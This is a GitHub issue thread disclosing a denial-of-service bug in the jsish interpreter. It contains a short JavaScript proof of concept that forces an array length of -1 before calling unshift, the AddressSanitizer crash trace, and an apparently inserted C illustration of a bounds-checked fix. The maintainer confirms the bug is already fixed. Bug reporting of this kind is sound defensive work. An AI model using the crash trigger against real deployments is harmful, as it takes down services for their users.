
DOS #15

Closed
bird8693 opened this issue May 20, 2020 · 3 comments

Comments

@bird8693

Environment

operating system: ubuntu18.04
compile command: export JSI__SANITIZE=1 && make
test command: ./jsish poc

poc:

```js
var arr = [
    {
        a: 1,
        b: 2
    },
    {
        a: 1,
        b: 2
    },
    {
        a: 1,
        b: 2
    }
];
arr.length = ~arr;
arr.unshift(-9007199254740991, 153, 10000, 1e+81);
```

vulnerability description:

ASAN outputs the following error. It seems that it is operating Jsi_ObjArraySizer, which causes negative values to be passed into realloc. For correct operation, abnormal parameters should be detected.

```
=================================================================
==91080==ERROR: AddressSanitizer: negative-size-param: (size=-8)
    #0 0x7f47518aa05d in __asan_memmove (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8d05d)
    #1 0x483c77 in jsi_ArrayUnshiftCmd src/jsiArray.c:816
    #2 0x59e6a6 in jsi_FunctionSubCall src/jsiEval.c:855
    #3 0x59f349 in jsiEvalFunction src/jsiEval.c:916
    #4 0x5a3e0c in jsi_evalcode_sub src/jsiEval.c:1306
    #5 0x5b28b8 in jsi_evalcode src/jsiEval.c:2154
    #6 0x5b5e1c in jsi_evalStrFile src/jsiEval.c:2468
    #7 0x5b6749 in Jsi_EvalFile src/jsiEval.c:2517
    #8 0x43bd4c in Jsi_Main src/jsiInterp.c:922
    #9 0x6996e9 in jsi_main src/main.c:44
    #10 0x6997d4 in main src/main.c:52
    #11 0x7f4750d4982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #12 0x414cb8 in _start (/home/node/xjsish/jsish+0x414cb8)

0x60c000015940 is located 0 bytes inside of 128-byte region [0x60c000015940,0x60c0000159c0)
allocated by thread T0 here:
    #0 0x7f47518b5961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961)
    #1 0x44ecd9 in Jsi_Realloc src/jsiUtils.c:47
    #2 0x4d16ea in Jsi_ObjArraySizer src/jsiObj.c:427
    #3 0x4d182f in Jsi_ObjNewArray src/jsiObj.c:441
    #4 0x5b00ca in jsi_evalcode_sub src/jsiEval.c:1914
    #5 0x5b28b8 in jsi_evalcode src/jsiEval.c:2154
    #6 0x5b5e1c in jsi_evalStrFile src/jsiEval.c:2468
    #7 0x5b6749 in Jsi_EvalFile src/jsiEval.c:2517
    #8 0x43bd4c in Jsi_Main src/jsiInterp.c:922
    #9 0x6996e9 in jsi_main src/main.c:44
    #10 0x6997d4 in main src/main.c:52
    #11 0x7f4750d4982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: negative-size-param ??:0 __asan_memmove
==91080==ABORTING
```
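The bug class in the report is a signed array length (forced to -1 by `arr.length = ~arr`) flowing unchecked into the byte count handed to memmove/realloc. The following is an added illustration, not jsish's code: a hypothetical pointer-array `unshift` that rejects a negative length and an overflowing byte count before any memory operation, plus two constructed scenarios mirroring the PoC.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical pointer-array model (not jsish's Jsi_Obj); len is signed to
 * mirror a script-visible length that a script may have set to -1. */
typedef struct { void **items; int64_t len; size_t cap; } Arr;

/* Prepend n items. Returns 0 on success, -1 with errno set when the length
 * is negative, the byte count would overflow size_t, or realloc fails. */
int arr_unshift(Arr *a, void **src, size_t n) {
    const size_t max_items = SIZE_MAX / sizeof(void *);
    if (a == NULL || a->len < 0) { errno = EINVAL; return -1; }   /* reject corrupted length */
    size_t len = (size_t)a->len;
    if (len > max_items || n > max_items - len) { errno = EOVERFLOW; return -1; }
    if (n == 0) return 0;
    size_t new_len = len + n;
    if (new_len > a->cap) {
        void **p = realloc(a->items, new_len * sizeof(void *));  /* checked above, never negative */
        if (p == NULL) { errno = ENOMEM; return -1; }
        a->items = p; a->cap = new_len;
    }
    memmove(a->items + n, a->items, len * sizeof(void *));        /* shift existing elements right */
    memcpy(a->items, src, n * sizeof(void *));
    a->len = (int64_t)new_len;
    return 0;
}

/* Constructed scenario from the report: length forced to -1, then unshift of
 * four values. Returns 1 if the bad length is rejected before any memmove. */
int rejects_negative_length(void) {
    int v[4]; void *src[4] = { &v[0], &v[1], &v[2], &v[3] };
    Arr a = { NULL, -1, 0 };
    return arr_unshift(&a, src, 4) == -1 && errno == EINVAL;
}

/* Sanity case: three elements, unshift four, expect seven in order.
 * Returns the new length, or -1 on failure or wrong ordering. */
int64_t unshift_ok_len(void) {
    int v[7]; void *src[4] = { &v[0], &v[1], &v[2], &v[3] };
    Arr a = { malloc(3 * sizeof(void *)), 3, 3 };
    if (a.items == NULL) return -1;
    a.items[0] = &v[4]; a.items[1] = &v[5]; a.items[2] = &v[6];
    int rc = arr_unshift(&a, src, 4);
    int ordered = rc == 0 && a.items[0] == &v[0] && a.items[3] == &v[3]
                  && a.items[4] == &v[4] && a.items[6] == &v[6];
    int64_t out = ordered ? a.len : -1;
    free(a.items);
    return out;
}
```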
@pcmacdon
Owner

pcmacdon commented May 20, 2020

Can not reproduce. I believe this was fixed in release "3.0.8".
Could you run "jsish -v" to check which version you are seeing this in?

Hint: memmove is no longer at jsi_ArrayUnshiftCmd src/jsiArray.c:816

@bird8693
Author

> Can not reproduce. I believe this was fixed in release "3.0.8".
> Could you run "jsish -v" to check which version you are seeing this in?
>
> Hint: memmove is no longer at jsi_ArrayUnshiftCmd src/jsiArray.c:816

OK! It has indeed been fixed!

@pcmacdon
Owner

Perfect!
